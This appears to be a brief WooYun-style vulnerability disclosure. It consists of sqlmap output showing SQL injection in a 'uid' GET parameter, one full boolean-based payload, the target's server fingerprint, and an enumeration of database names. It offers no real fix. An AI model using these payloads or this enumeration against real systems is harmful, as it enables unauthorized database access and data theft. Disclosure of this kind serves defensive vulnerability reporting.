code 区域Place: GET
Parameter: uid
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: uid=-4918 OR (3862=3862)#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=1。。。
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uid=1 。。。
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: uid=1 。。。
---
[12:30:29] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.17, PHP 5.3.4
back-end DBMS: MySQL 5.0
[12:30:29] [INFO] fetching database names
[12:30:31] [INFO] the SQL query used returns 6 entries
[12:30:33] [INFO] retrieved: "information_schema"
[12:30:34] [INFO] retrieved: "iscserver"
[12:30:36] [INFO] retrieved: "iscserver_bak"
[12:30:38] [INFO] retrieved: "mysql"
[12:30:39] [INFO] retrieved: "performance_schema"
[12:30:41] [INFO] retrieved: "test"
available databases [6]:
information_schema
iscserver
iscserver_bak
mysql
performance_schema
test
修复方案:你们更懂
版权声明:转载请注明来源 大大灰狼@乌云
